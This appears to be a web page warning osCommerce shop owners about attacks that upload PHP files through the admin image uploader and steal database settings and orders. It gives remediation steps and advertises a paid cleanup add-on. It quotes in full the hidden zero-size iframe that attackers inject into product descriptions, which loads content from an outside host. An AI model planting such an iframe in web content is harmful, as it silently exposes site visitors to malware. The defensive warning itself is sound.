There has been a recent increase of attacks on OSComerce websites. Hackers exploit a vulnerability in the admin pages that is usually used for uploading product pictures to the /images directory. Several PHP files are uploaded there and are then executed. Server information such as the database configuration and sometimes credit card orders are displayed and captured.
Sometimes traces are left by the hacker. PHP files show up in the images directory (though sometimes they're deleted after being run). Often, the following code is added to every product_description and categories_description
<iframe src="http://www.vcp-counter.com/unique/index.php" width=0 height=0 frameborder=0></iframe>
What Should I do?
The exploit cannot be run on sites where the admin directory is password protected. If you use your Webserver Control Panel to set up username/password (Basic Authentication) on the admin directory, you can get your browser to remember the username and password for you so it's not onerous logging in, but you'll be safe from further exploits using this method.
Of course, if there's PHP files left in your images directory, the hacker could come back and run them to get your customer orders again - DELETE THEM!
Change the passwords for your FTP and your mysql database. You should normally be able to do this in your website control panel.
Finally, antivirus software may report MALWARE on your website if you leave the iframe HTML in your database. Simply edit every entry manually to remove it..... Easier said than done I know. That's why I've written PHP software which will do the job for you. The code you get when you click a purchase button below checks your images directory for PHP files and then allows you to delete them. It also checks your database for IFRAME tags and will allow you to automatically remove it from every database entry.
Click Buy Now to purchase the addon to install onto your site. It's very simple to install and configure and was written with instructions for OSC MS2.2 RC2 but has also been integrated with CRELoaded. Or choose the install option to have us do it all for you.
This site is based on CRE Loaded 6.4 but you wouldn't know it. It's got many jQuery, AJAX and SEO enhancements together with a leading-edge customer management system